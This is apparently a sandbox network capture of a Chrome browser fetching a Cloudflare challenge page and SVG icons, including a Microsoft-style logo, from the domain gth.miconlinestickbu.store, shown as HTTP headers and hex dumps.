                                    2024-05-22 15:09:26 UTC230INData Raw: 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                    Data Ascii: 1" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                    2024-05-22 15:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.449810104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC403OUTGET /1 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:26 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16151
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:26 UTC759INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6c 66 70 70 4d 52 2f 2f 4b 62 55 6a 49 49 4b 52 43 59 59 76 6d 37 68 4b 53 4b 76 2b 4c 47 4d 54 77 53 6e 52 38 55 75 67 57 30 78 49 69 76 6a 66 58 44 61 6f 6d 70 6c 43 76 41 68 30 53 6b 37 77 5a 72 77 64 6e 41 52 33 50 6b 33 6a 6a 52 54 2f 68 47 32 35 6f 47 6f 6a 69 4c 53 44 6d 72 79 56 55 6a 36 43 37 59 38 37 35 55 6a 69 79 31 34 75 78 4d 62 34 71 36 6e 2f 66 63 76 4d 2f 34 4a 76 39 44 4b 59 57 64 45 41 45 63 6b 4f 65 6b 33 4f 4f 7a 79 76 4c 41 3d 3d 24 2f 79 65 53 58 75 47 46 38 2f 35 59 53 6e 49 5a 77 7a 78 34 57 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: lfppMR//KbUjIIKRCYYvm7hKSKv+LGMTwSnR8UugW0xIivjfXDaomplCvAh0Sk7wZrwdnAR3Pk3jjRT/hG25oGojiLSDmryVUj6C7Y875Ujiy14uxMb4q6n/fcvM/4Jv9DKYWdEAEckOek3OOzyvLA==$/yeSXuGF8/5YSnIZwzx4Ww==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:26 UTC699INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:26 UTC1369INData Raw: 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                                    Data Ascii: r:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url
                                    2024-05-22 15:09:26 UTC1369INData Raw: 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f
                                    Data Ascii: height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{bo
                                    2024-05-22 15:09:26 UTC1369INData Raw: 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a
                                    Data Ascii: TYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:
                                    2024-05-22 15:09:26 UTC1369INData Raw: 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74
                                    Data Ascii: 1NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:t
                                    2024-05-22 15:09:26 UTC1369INData Raw: 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79
                                    Data Ascii: uMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy
                                    2024-05-22 15:09:26 UTC1369INData Raw: 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79
                                    Data Ascii: er-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display
                                    2024-05-22 15:09:26 UTC1369INData Raw: 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c
                                    Data Ascii: screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl
                                    2024-05-22 15:09:26 UTC1369INData Raw: 31 4f 70 37 4a 42 72 34 31 4a 65 6d 39 4b 34 31 62 6f 41 52 5a 69 63 76 36 77 5a 50 79 75 75 65 52 76 4c 79 69 61 4e 70 4b 65 52 44 42 7a 79 74 56 43 52 59 63 5f 76 64 57 43 32 51 6a 6e 33 30 34 4f 7a 76 62 45 68 41 32 33 4d 67 6a 61 4a 4f 34 30 48 4a 55 68 44 58 4d 5a 59 59 32 52 72 52 39 5f 48 52 45 69 57 49 64 45 63 4b 6f 6a 53 72 68 43 64 49 53 36 55 43 52 69 71 6c 44 38 53 33 78 48 38 6d 62 38 77 34 7a 77 33 55 50 4d 50 6b 78 63 62 54 46 2e 42 33 2e 6d 59 61 6e 6a 33 5f 76 53 59 52 78 61 75 36 72 58 38 2e 61 33 4d 45 38 4b 66 47 71 79 6b 4e 78 36 59 4b 46 6b 35 4f 73 65 57 5a 64 6b 4c 4d 69 72 46 38 59 4d 4a 63 45 53 34 63 4f 46 72 38 30 4a 31 33 79 30 72 48 71 74 76 2e 65 4c 68 6a 64 48 36 5f 5a 56 70 37 48 72 4c 44 36 6b 2e 69 63 66 75 58 51 69 5f
                                    Data Ascii: 1Op7JBr41Jem9K41boARZicv6wZPyuueRvLyiaNpKeRDBzytVCRYc_vdWC2Qjn304OzvbEhA23MgjaJO40HJUhDXMZYY2RrR9_HREiWIdEcKojSrhCdIS6UCRiqlD8S3xH8mb8w4zw3UPMPkxcbTF.B3.mYanj3_vSYRxau6rX8.a3ME8KfGqykNx6YKFk5OseWZdkLMirF8YMJcES4cOFr80J13y0rHqtv.eLhjdH6_ZVp7HrLD6k.icfuXQi_


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.449806104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC1199OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:26 UTC683INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:26 GMT
                                    Content-Type: image/svg+xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Vary: Accept-Encoding
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EZQ9A239nYLlQaJpFVIPUqp1YBNOczbAuwDzI3kZXuQJGOUNoPIvXBi4bmZZiuRaE%2BGXGuLIumAieMEDw3SKAjWWL6AdwbSen5UWu3%2BelRg%2BTswBckvH%2BJMh4SjND%2FZiWeJRDt7PvtBf%2Fo1hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2eadb3c470-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:26 UTC686INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                    Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                    2024-05-22 15:09:26 UTC913INData Raw: 30 2c 31 2c 33 30 2c 31 39 61 31 30 2e 30 31 35 2c 31 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36 39 2c 39 2e 32 36 39 2c 30 2c 30 2c 30 2c 32 32 2e 35 2c 31 30 2e 37 31 39 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2c 31 39 2c 31 30 61 38 2e 37 38
                                    Data Ascii: 0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.78
                                    2024-05-22 15:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.449807104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC1225OUTGET /x/617b5a702a34daddd03071650f95cbe6664e0aa557460 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:27 UTC654INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:27 GMT
                                    Content-Type: image/svg+xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CrtbplJ7Ts50Ffwf6vozefv3cO5hcbSp1dY35h%2B1vnVp8C%2BTOBbW0Hu3WR10kmnw3cxMfskrN3XrfVP91I%2FAsF97vlawby2SsmBs8QbOgeKWURONYgE%2BZDfEhjfU5xxw4ZAg0%2FV9VVJipSh0rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2ebc874368-EWR
                                    alt-svc: h3=":443"; ma=86400
